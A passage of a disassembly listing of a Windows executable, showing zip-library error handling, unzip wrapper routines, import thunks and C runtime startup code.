jz loc_410EEB
cmp dword ptr [ebp-10h], 200h
ja short loc_410D98
cmp dword ptr [ebp-10h], 200h
jz loc_410EC7
cmp dword ptr [ebp-10h], 0
jz loc_410EAF
cmp dword ptr [ebp-10h], 100h
jz loc_410EBB
jmp loc_410F7C
; ---------------------------------------------------------------------------
loc_410D98: ; CODE XREF: HSho:00410D6D�j
cmp dword ptr [ebp-10h], 300h
jz loc_410ED3
cmp dword ptr [ebp-10h], 400h
jz loc_410EDF
jmp loc_410F7C
; ---------------------------------------------------------------------------
loc_410DB7: ; CODE XREF: HSho:00410D57�j
cmp dword ptr [ebp-10h], 800h
ja short loc_410DEC
cmp dword ptr [ebp-10h], 800h
jz loc_410F09
cmp dword ptr [ebp-10h], 600h
jz loc_410EF7
cmp dword ptr [ebp-10h], 700h
jz loc_410F00
jmp loc_410F7C
; ---------------------------------------------------------------------------
loc_410DEC: ; CODE XREF: HSho:00410DBE�j
cmp dword ptr [ebp-10h], 10000h
jz loc_410F12
jmp loc_410F7C
; ---------------------------------------------------------------------------
loc_410DFE: ; CODE XREF: HSho:00410D3D�j
cmp dword ptr [ebp-10h], 80000h
ja short loc_410E68
cmp dword ptr [ebp-10h], 80000h
jz loc_410F48
cmp dword ptr [ebp-10h], 50000h
ja short loc_410E49
cmp dword ptr [ebp-10h], 50000h
jz loc_410F3F
cmp dword ptr [ebp-10h], 30000h
jz loc_410F2D
cmp dword ptr [ebp-10h], 40000h
jz loc_410F36
jmp loc_410F7C
; ---------------------------------------------------------------------------
loc_410E49: ; CODE XREF: HSho:00410E1B�j
cmp dword ptr [ebp-10h], 60000h
jz loc_410F63
cmp dword ptr [ebp-10h], 70000h
jz loc_410F1B
jmp loc_410F7C
; ---------------------------------------------------------------------------
loc_410E68: ; CODE XREF: HSho:00410E05�j
cmp dword ptr [ebp-10h], 4000000h
ja short loc_410E9D
cmp dword ptr [ebp-10h], 4000000h
jz loc_410F6C
cmp dword ptr [ebp-10h], 1000000h
jz loc_410F51
cmp dword ptr [ebp-10h], 2000000h
jz loc_410F5A
jmp loc_410F7C
; ---------------------------------------------------------------------------
loc_410E9D: ; CODE XREF: HSho:00410E6F�j
cmp dword ptr [ebp-10h], 5000000h
jz loc_410F75
jmp loc_410F7C
; ---------------------------------------------------------------------------
loc_410EAF: ; CODE XREF: HSho:00410D80�j
mov dword ptr [ebp-8], offset aSuccess ; "Success"
jmp loc_410F7C
; ---------------------------------------------------------------------------
loc_410EBB: ; CODE XREF: HSho:00410D8D�j
mov dword ptr [ebp-8], offset aCuldnTDuplicat ; "Culdn't duplicate handle"
jmp loc_410F7C
; ---------------------------------------------------------------------------
loc_410EC7: ; CODE XREF: HSho:00410D76�j
mov dword ptr [ebp-8], offset aCouldnTCreateO ; "Couldn't create/open file"
jmp loc_410F7C
; ---------------------------------------------------------------------------
loc_410ED3: ; CODE XREF: HSho:00410D9F�j
mov dword ptr [ebp-8], offset aFailedToAlloca ; "Failed to allocate memory"
jmp loc_410F7C
; ---------------------------------------------------------------------------
loc_410EDF: ; CODE XREF: HSho:00410DAC�j
mov dword ptr [ebp-8], offset aErrorWritingTo ; "Error writing to file"
jmp loc_410F7C
; ---------------------------------------------------------------------------
loc_410EEB: ; CODE XREF: HSho:00410D60�j
mov dword ptr [ebp-8], offset aFileNotFoundIn ; "File not found in the zipfile"
jmp loc_410F7C
; ---------------------------------------------------------------------------
loc_410EF7: ; CODE XREF: HSho:00410DD4�j
mov dword ptr [ebp-8], offset aStillMoreDataT ; "Still more data to unzip"
jmp short loc_410F7C
; ---------------------------------------------------------------------------
loc_410F00: ; CODE XREF: HSho:00410DE1�j
mov dword ptr [ebp-8], offset aZipfileIsCorru ; "Zipfile is corrupt or not a zipfile"
jmp short loc_410F7C
; ---------------------------------------------------------------------------
loc_410F09: ; CODE XREF: HSho:00410DC7�j
mov dword ptr [ebp-8], offset aErrorReadingFi ; "Error reading file"
jmp short loc_410F7C
; ---------------------------------------------------------------------------
loc_410F12: ; CODE XREF: HSho:00410DF3�j
mov dword ptr [ebp-8], offset aCallerFaultyAr ; "Caller: faulty arguments"
jmp short loc_410F7C
; ---------------------------------------------------------------------------
loc_410F1B: ; CODE XREF: HSho:00410E5D�j
mov dword ptr [ebp-8], offset aCallerTheFileH ; "Caller: the file had already been parti"...
jmp short loc_410F7C
; ---------------------------------------------------------------------------
loc_410F24: ; CODE XREF: HSho:00410D4A�j
mov dword ptr [ebp-8], offset aCallerCanOnlyG ; "Caller: can only get memory of a memory"...
jmp short loc_410F7C
; ---------------------------------------------------------------------------
loc_410F2D: ; CODE XREF: HSho:00410E31�j
mov dword ptr [ebp-8], offset aCallerNotEnoug ; "Caller: not enough space allocated for "...
jmp short loc_410F7C
; ---------------------------------------------------------------------------
loc_410F36: ; CODE XREF: HSho:00410E3E�j
mov dword ptr [ebp-8], offset aCallerThereWas ; "Caller: there was a previous error"
jmp short loc_410F7C
; ---------------------------------------------------------------------------
loc_410F3F: ; CODE XREF: HSho:00410E24�j
mov dword ptr [ebp-8], offset aCallerAddition ; "Caller: additions to the zip have alrea"...
jmp short loc_410F7C
; ---------------------------------------------------------------------------
loc_410F48: ; CODE XREF: HSho:00410E0E�j
mov dword ptr [ebp-8], offset aCallerMixingCr ; "Caller: mixing creation and opening of "...
jmp short loc_410F7C
; ---------------------------------------------------------------------------
loc_410F51: ; CODE XREF: HSho:00410E85�j
mov dword ptr [ebp-8], offset aZipBugInternal ; "Zip-bug: internal initialisation not co"...
jmp short loc_410F7C
; ---------------------------------------------------------------------------
loc_410F5A: ; CODE XREF: HSho:00410E92�j
mov dword ptr [ebp-8], offset aZipBugTryingTo ; "Zip-bug: trying to seek the unseekable"
jmp short loc_410F7C
; ---------------------------------------------------------------------------
loc_410F63: ; CODE XREF: HSho:00410E50�j
mov dword ptr [ebp-8], offset aZipBugTheAntic ; "Zip-bug: the anticipated size turned ou"...
jmp short loc_410F7C
; ---------------------------------------------------------------------------
loc_410F6C: ; CODE XREF: HSho:00410E78�j
mov dword ptr [ebp-8], offset aZipBugTriedToC ; "Zip-bug: tried to change mind, but not "...
jmp short loc_410F7C
; ---------------------------------------------------------------------------
loc_410F75: ; CODE XREF: HSho:00410EA4�j
mov dword ptr [ebp-8], offset aZipBugAnIntern ; "Zip-bug: an internal error during flati"...
loc_410F7C: ; CODE XREF: HSho:00410D93�j
; HSho:00410DB2�j ...
mov edx, [ebp-8]
push edx
call sub_41162E ; strlen
add esp, 4
mov [ebp-4], eax
cmp dword ptr [ebp+0Ch], 0
jz short loc_410F97
cmp dword ptr [ebp+10h], 0
jnz short loc_410F9C
loc_410F97: ; CODE XREF: HSho:00410F8F�j
mov eax, [ebp-4]
jmp short loc_410FD7
; ---------------------------------------------------------------------------
loc_410F9C: ; CODE XREF: HSho:00410F95�j
mov eax, [ebp-4]
mov [ebp-0Ch], eax
mov ecx, [ebp-0Ch]
add ecx, 1
cmp ecx, [ebp+10h]
jbe short loc_410FB6
mov edx, [ebp+10h]
sub edx, 1
mov [ebp-0Ch], edx
loc_410FB6: ; CODE XREF: HSho:00410FAB�j
mov eax, [ebp-0Ch]
push eax
mov ecx, [ebp-8]
push ecx
mov edx, [ebp+0Ch]
push edx
call dword_41319C ; strncpy
add esp, 0Ch
mov eax, [ebp+0Ch]
add eax, [ebp-0Ch]
mov byte ptr [eax], 0
mov eax, [ebp-4]
loc_410FD7: ; CODE XREF: HSho:00410F9A�j
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410FDB proc near ; CODE XREF: sub_404A2D+26�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_410FDB
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push 23Ch
call sub_4114F4
add esp, 4
mov [ebp+var_1C], eax
mov [ebp+var_4], 0
cmp [ebp+var_1C], 0
jz short loc_411020
mov ecx, [ebp+var_1C]
call sub_4114C0
mov [ebp+var_28], eax
jmp short loc_411027
; ---------------------------------------------------------------------------
loc_411020: ; CODE XREF: sub_410FDB+36�j
mov [ebp+var_28], 0
loc_411027: ; CODE XREF: sub_410FDB+43�j
mov eax, [ebp+var_28]
mov [ebp+var_18], eax
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, [ebp+var_18]
mov [ebp+var_10], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+var_10]
call sub_40FE9E
mov ds:dword_41BCD4, eax
cmp ds:dword_41BCD4, 0
jz short loc_411072
mov edx, [ebp+var_10]
mov [ebp+var_20], edx
mov eax, [ebp+var_20]
push eax
call sub_4114EE
add esp, 4
xor eax, eax
jmp short loc_41109A
; ---------------------------------------------------------------------------
loc_411072: ; CODE XREF: sub_410FDB+7F�j
push 8
call sub_4114F4
add esp, 4
mov [ebp+var_24], eax
mov ecx, [ebp+var_24]
mov [ebp+var_14], ecx
mov edx, [ebp+var_14]
mov dword ptr [edx], 1
mov eax, [ebp+var_14]
mov ecx, [ebp+var_10]
mov [eax+4], ecx
mov eax, [ebp+var_14]
loc_41109A: ; CODE XREF: sub_410FDB+95�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_410FDB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4110A8 proc near ; CODE XREF: sub_404A2D+37�p
; sub_404A2D+52�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
cmp [ebp+arg_0], 0
jnz short loc_4110C5
mov ds:dword_41BCD4, 10000h
mov eax, 10000h
jmp short loc_411107
; ---------------------------------------------------------------------------
loc_4110C5: ; CODE XREF: sub_4110A8+A�j
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
cmp dword ptr [ecx], 1
jz short loc_4110E4
mov ds:dword_41BCD4, 80000h
mov eax, 80000h
jmp short loc_411107
; ---------------------------------------------------------------------------
loc_4110E4: ; CODE XREF: sub_4110A8+29�j
mov edx, [ebp+var_8]
mov eax, [edx+4]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov ecx, [ebp+var_4]
call sub_40FF4C
mov ds:dword_41BCD4, eax
mov eax, ds:dword_41BCD4
loc_411107: ; CODE XREF: sub_4110A8+1B�j
; sub_4110A8+3A�j
mov esp, ebp
pop ebp
retn
sub_4110A8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 134h
cmp dword ptr [ebp+8], 0
jnz short loc_41112E
mov ds:dword_41BCD4, 10000h
mov eax, 10000h
jmp loc_411210
; ---------------------------------------------------------------------------
loc_41112E: ; CODE XREF: HSho:00411118�j
mov eax, [ebp+8]
mov [ebp-134h], eax
mov ecx, [ebp-134h]
cmp dword ptr [ecx], 1
jz short loc_411156
mov ds:dword_41BCD4, 80000h
mov eax, 80000h
jmp loc_411210
; ---------------------------------------------------------------------------
loc_411156: ; CODE XREF: HSho:00411140�j
mov edx, [ebp-134h]
mov eax, [edx+4]
mov [ebp-4], eax
lea ecx, [ebp-130h]
push ecx
mov edx, [ebp+0Ch]
push edx
mov ecx, [ebp-4]
call sub_40FF4C
mov ds:dword_41BCD4, eax
cmp ds:dword_41BCD4, 0
jnz loc_41120B
mov eax, [ebp+10h]
mov ecx, [ebp-130h]
mov [eax], ecx
mov edx, [ebp+10h]
mov eax, [ebp-28h]
mov [edx+108h], eax
mov ecx, [ebp+10h]
mov edx, [ebp-24h]
mov [ecx+10Ch], edx
mov eax, [ebp-20h]
mov [ecx+110h], eax
mov ecx, [ebp+10h]
mov edx, [ebp-1Ch]
mov [ecx+114h], edx
mov eax, [ebp-18h]
mov [ecx+118h], eax
mov ecx, [ebp+10h]
mov edx, [ebp-14h]
mov [ecx+11Ch], edx
mov eax, [ebp-10h]
mov [ecx+120h], eax
mov ecx, [ebp+10h]
mov edx, [ebp-0Ch]
mov [ecx+124h], edx
mov eax, [ebp+10h]
mov ecx, [ebp-8]
mov [eax+128h], ecx
lea edx, [ebp-12Ch]
push edx
mov eax, [ebp+10h]
add eax, 4
push eax
call sub_411628 ; strcpy
add esp, 8
loc_41120B: ; CODE XREF: HSho:00411181�j
mov eax, ds:dword_41BCD4
loc_411210: ; CODE XREF: HSho:00411129�j
; HSho:00411151�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
cmp dword ptr [ebp+8], 0
jnz short loc_411231
mov ds:dword_41BCD4, 10000h
mov eax, 10000h
jmp short loc_41127B
; ---------------------------------------------------------------------------
loc_411231: ; CODE XREF: HSho:0041121E�j
mov eax, [ebp+8]
mov [ebp-8], eax
mov ecx, [ebp-8]
cmp dword ptr [ecx], 1
jz short loc_411250
mov ds:dword_41BCD4, 80000h
mov eax, 80000h
jmp short loc_41127B
; ---------------------------------------------------------------------------
loc_411250: ; CODE XREF: HSho:0041123D�j
mov edx, [ebp-8]
mov eax, [edx+4]
mov [ebp-4], eax
mov ecx, [ebp+18h]
push ecx
mov edx, [ebp+14h]
push edx
mov al, [ebp+10h]
push eax
mov ecx, [ebp+0Ch]
push ecx
mov ecx, [ebp-4]
call sub_4105D7
mov ds:dword_41BCD4, eax
mov eax, ds:dword_41BCD4
loc_41127B: ; CODE XREF: HSho:0041122F�j
; HSho:0041124E�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 134h
cmp dword ptr [ebp+8], 0
jnz short loc_4112A2
mov ds:dword_41BCD4, 10000h
mov eax, 10000h
jmp loc_41138C
; ---------------------------------------------------------------------------
loc_4112A2: ; CODE XREF: HSho:0041128C�j
mov eax, [ebp+8]
mov [ebp-134h], eax
mov ecx, [ebp-134h]
cmp dword ptr [ecx], 1
jz short loc_4112CA
mov ds:dword_41BCD4, 80000h
mov eax, 80000h
jmp loc_41138C
; ---------------------------------------------------------------------------
loc_4112CA: ; CODE XREF: HSho:004112B4�j
mov edx, [ebp-134h]
mov eax, [edx+4]
mov [ebp-4], eax
lea ecx, [ebp-130h]
push ecx
mov edx, [ebp+14h]
push edx
mov al, [ebp+10h]
push eax
mov ecx, [ebp+0Ch]
push ecx
mov ecx, [ebp-4]
call sub_4105D7
mov ds:dword_41BCD4, eax
cmp ds:dword_41BCD4, 0
jnz loc_411387
mov edx, [ebp+18h]
mov eax, [ebp-130h]
mov [edx], eax
mov ecx, [ebp+18h]
mov edx, [ebp-28h]
mov [ecx+108h], edx
mov eax, [ebp+18h]
mov ecx, [ebp-24h]
mov [eax+10Ch], ecx
mov edx, [ebp-20h]
mov [eax+110h], edx
mov eax, [ebp+18h]
mov ecx, [ebp-1Ch]
mov [eax+114h], ecx
mov edx, [ebp-18h]
mov [eax+118h], edx
mov eax, [ebp+18h]
mov ecx, [ebp-14h]
mov [eax+11Ch], ecx
mov edx, [ebp-10h]
mov [eax+120h], edx
mov eax, [ebp+18h]
mov ecx, [ebp-0Ch]
mov [eax+124h], ecx
mov edx, [ebp+18h]
mov eax, [ebp-8]
mov [edx+128h], eax
lea ecx, [ebp-12Ch]
push ecx
mov edx, [ebp+18h]
add edx, 4
push edx
call sub_411628 ; strcpy
add esp, 8
loc_411387: ; CODE XREF: HSho:004112FD�j
mov eax, ds:dword_41BCD4
loc_41138C: ; CODE XREF: HSho:0041129D�j
; HSho:004112C5�j
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411390 proc near ; CODE XREF: sub_404A2D+64�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8
cmp [ebp+arg_0], 0
jnz short loc_4113AD
mov ds:dword_41BCD4, 10000h
mov eax, 10000h
jmp short loc_4113F7
; ---------------------------------------------------------------------------
loc_4113AD: ; CODE XREF: sub_411390+A�j
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
cmp dword ptr [ecx], 1
jz short loc_4113CC
mov ds:dword_41BCD4, 80000h
mov eax, 80000h
jmp short loc_4113F7
; ---------------------------------------------------------------------------
loc_4113CC: ; CODE XREF: sub_411390+29�j
mov edx, [ebp+var_8]
mov eax, [edx+4]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov ecx, [ebp+var_4]
call sub_4107B2
mov ds:dword_41BCD4, eax
mov eax, ds:dword_41BCD4
loc_4113F7: ; CODE XREF: sub_411390+1B�j
; sub_411390+3A�j
mov esp, ebp
pop ebp
retn
sub_411390 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4113FB proc near ; CODE XREF: sub_404A2D+72�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_0], 0
jnz short loc_411418
mov ds:dword_41BCD4, 10000h
mov eax, 10000h
jmp short loc_411476
; ---------------------------------------------------------------------------
loc_411418: ; CODE XREF: sub_4113FB+A�j
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
cmp dword ptr [ecx], 1
jz short loc_411437
mov ds:dword_41BCD4, 80000h
mov eax, 80000h
jmp short loc_411476
; ---------------------------------------------------------------------------
loc_411437: ; CODE XREF: sub_4113FB+29�j
mov edx, [ebp+var_8]
mov eax, [edx+4]
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
call sub_410CC8
mov ds:dword_41BCD4, eax
mov ecx, [ebp+var_4]
mov [ebp+var_C], ecx
mov edx, [ebp+var_C]
push edx
call sub_4114EE
add esp, 4
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
push ecx
call sub_4114EE
add esp, 4
mov eax, ds:dword_41BCD4
loc_411476: ; CODE XREF: sub_4113FB+1B�j
; sub_4113FB+3A�j
mov esp, ebp
pop ebp
retn
sub_4113FB endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
cmp dword ptr [ebp+8], 0
jnz short loc_411488
mov al, 1
jmp short loc_411499
; ---------------------------------------------------------------------------
loc_411488: ; CODE XREF: HSho:00411482�j
mov eax, [ebp+8]
mov [ebp-4], eax
mov ecx, [ebp-4]
xor eax, eax
cmp dword ptr [ecx], 1
setz al
loc_411499: ; CODE XREF: HSho:00411486�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4114A0 proc near ; CODE XREF: sub_4107B2+339�p
; sub_4107B2+355�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call dword_413214 ; _mbsstr
add esp, 8
pop ebp
retn
sub_4114A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4114C0 proc near ; CODE XREF: sub_410FDB+3B�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov ecx, [ebp+var_4]
mov dword ptr [ecx+4], 0FFFFFFFFh
mov edx, [ebp+var_4]
mov dword ptr [edx+134h], 0FFFFFFFFh
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4114C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4114EE proc near ; CODE XREF: sub_4010DD+16�p
; sub_4019B0+1D�p ...
jmp dword_413104
sub_4114EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4114F4 proc near ; CODE XREF: sub_40103D+1D�p
; sub_404151+10�p ...
jmp dword_413138
sub_4114F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4114FA proc near ; CODE XREF: sub_401ACF+99�p
; sub_402C48+80�p ...
jmp dword_413134
sub_4114FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411500 proc near ; CODE XREF: sub_401C92+CC�p
jmp dword_413130
sub_411500 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411506 proc near ; CODE XREF: HSho:00402644�p
; sub_402A1E+15C�p ...
jmp dword_41312C
sub_411506 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41150C proc near ; CODE XREF: HSho:00402638�p
; sub_402A1E+B7�p ...
jmp dword_413128
sub_41150C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411512 proc near ; CODE XREF: HSho:0040261C�p
; HSho:00402659�p ...
jmp dword_413124
sub_411512 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411518 proc near ; CODE XREF: HSho:00402610�p
; sub_402A1E+141�p ...
jmp dword_413120
sub_411518 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41151E proc near ; CODE XREF: HSho:0040253A�p
; sub_402A1E+18�p ...
jmp dword_41311C
sub_41151E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411524 proc near ; CODE XREF: sub_402A1E+129�p
; sub_405150+114�p ...
jmp dword_413118
sub_411524 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41152A proc near ; CODE XREF: sub_404605+16C�p
; sub_404605+292�p ...
jmp dword_413114
sub_41152A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411530 proc near ; CODE XREF: sub_406374+7F�p
; sub_40671B+A9�p ...
jmp dword_413110
sub_411530 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411536 proc near ; CODE XREF: sub_406374+72�p
; sub_406374+CB�p ...
jmp dword_41310C
sub_411536 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41153C proc near ; CODE XREF: sub_404B40+2E7�p
; sub_404B40+40A�p
jmp dword_413108
sub_41153C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411542 proc near ; CODE XREF: sub_404B40+270�p
; sub_404B40+3AA�p
jmp dword_413100
sub_411542 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411548 proc near ; CODE XREF: sub_405150+43�p
; sub_405150+54�p ...
jmp dword_4130FC
sub_411548 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41154E proc near ; CODE XREF: sub_405E1F+12F�p
; sub_40831F+1B3�p
jmp dword_4130F8
sub_41154E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411554 proc near ; CODE XREF: sub_405E1F+CC�p
; sub_405E1F+14F�p
jmp dword_4130F4
sub_411554 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41155A proc near ; CODE XREF: sub_406374+DA�p
; sub_40671B+104�p ...
jmp dword_4130F0
sub_41155A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411560 proc near ; CODE XREF: sub_406374+B7�p
; sub_406374+122�p ...
jmp dword_4130EC
sub_411560 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411566 proc near ; CODE XREF: sub_406374+68�p
; sub_406374+112�p ...
jmp dword_4130E8
sub_411566 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41156C proc near ; CODE XREF: SEH_401109+5�j
; sub_411A7A+5�j ...
jmp dword_4131DC
sub_41156C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411580 proc near ; CODE XREF: sub_401109+7C�p
cmp cl, 40h
jnb short loc_41159A
cmp cl, 20h
jnb short loc_411590
shld edx, eax, cl
shl eax, cl
retn
; ---------------------------------------------------------------------------
loc_411590: ; CODE XREF: sub_411580+8�j
mov edx, eax
xor eax, eax
and cl, 1Fh
shl edx, cl
retn
; ---------------------------------------------------------------------------
loc_41159A: ; CODE XREF: sub_411580+3�j
xor eax, eax
xor edx, edx
retn
sub_411580 endp
; =============== S U B R O U T I N E =======================================
sub_41159F proc near ; DATA XREF: HSho:off_414AD4�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_4117E8
test [esp+4+arg_0], 1
jz short loc_4115B5
push esi
call sub_4114EE
pop ecx
loc_4115B5: ; CODE XREF: sub_41159F+D�j
mov eax, esi
pop esi
retn 4
sub_41159F endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4115BC proc near ; CODE XREF: HSho:00401217�p
; HSho:004012F2�p ...
jmp dword_4131E0
sub_4115BC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4115D0 proc near ; CODE XREF: HSho:00401299�p
; sub_40146A+1E�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_4115F0
loc_4115DC: ; CODE XREF: sub_4115D0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_4115DC
loc_4115F0: ; CODE XREF: sub_4115D0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_4115D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411600 proc near ; CODE XREF: HSho:0040174B�p
cmp cl, 40h
jnb short loc_41161B
cmp cl, 20h
jnb short loc_411610
shrd eax, edx, cl
sar edx, cl
retn
; ---------------------------------------------------------------------------
loc_411610: ; CODE XREF: sub_411600+8�j
mov eax, edx
sar edx, 1Fh
and cl, 1Fh
sar eax, cl
retn
; ---------------------------------------------------------------------------
loc_41161B: ; CODE XREF: sub_411600+3�j
sar edx, 1Fh
mov eax, edx
retn
sub_411600 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411622 proc near ; CODE XREF: sub_401ACF+29�p
; HSho:00401C2F�p ...
jmp dword_413204
sub_411622 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411628 proc near ; CODE XREF: sub_402296+B1�p
; sub_402296+FA�p ...
jmp dword_4131FC
sub_411628 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41162E proc near ; CODE XREF: sub_402296+5A�p
; sub_40239F+B�p ...
jmp dword_4131F8
sub_41162E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411634 proc near ; CODE XREF: sub_4027A4+1E8�p
; sub_409E20+CA�p ...
jmp dword_4131C0
sub_411634 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41163A proc near ; CODE XREF: sub_402A1E+5�p
; sub_402BB1+5�p ...
jmp dword_4131BC
sub_41163A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411640 proc near ; CODE XREF: sub_402FAF+E8�p
; sub_4030F7+125�p ...
jmp dword_4131B8
sub_411640 endp
; =============== S U B R O U T I N E =======================================
sub_411646 proc near ; CODE XREF: sub_411672+4�p
arg_0 = dword ptr 4
cmp ds:dword_41BD10, 0FFFFFFFFh
jnz short loc_41165B
push [esp+arg_0]
call dword_413220 ; _onexit
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41165B: ; CODE XREF: sub_411646+7�j
push offset dword_41BD0C
push offset dword_41BD10
push [esp+8+arg_0]
call sub_4117EE ; __dllonexit
add esp, 0Ch
retn
sub_411646 endp
; =============== S U B R O U T I N E =======================================
sub_411672 proc near ; CODE XREF: sub_4082FE+8�p
; sub_411891+21�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_411646
neg eax
sbb eax, eax
pop ecx
neg eax
dec eax
retn
sub_411672 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411684 proc near ; CODE XREF: sub_40E8D4+11�p
; sub_40FF4C+4B8�p
jmp dword_41320C
sub_411684 endp
; ---------------------------------------------------------------------------
loc_41168A: ; CODE XREF: HSho:0041E714�j
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_414AD8
push offset sub_411816
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 68h
push ebx
push esi
push edi
mov [ebp-18h], esp
xor ebx, ebx
mov [ebp-4], ebx
push 2
call dword_41324C ; __set_app_type
pop ecx
or ds:dword_41BD0C, 0FFFFFFFFh
or ds:dword_41BD10, 0FFFFFFFFh
call dword_413248 ; __p__fmode
mov ecx, ds:dword_41BCF4
mov [eax], ecx
call dword_413244 ; __p__commode
mov ecx, ds:dword_41BCF0
mov [eax], ecx
mov eax, dword_413240
mov eax, [eax]
mov ds:dword_41BD08, eax
call nullsub_1
cmp ds:dword_417BD0, ebx
jnz short loc_41170D
push offset sub_411812
call dword_41323C ; __setusermatherr
pop ecx
loc_41170D: ; CODE XREF: HSho:004116FF�j
call sub_411800
push offset dword_417014
push offset dword_417010
call sub_4117FA ; _initterm
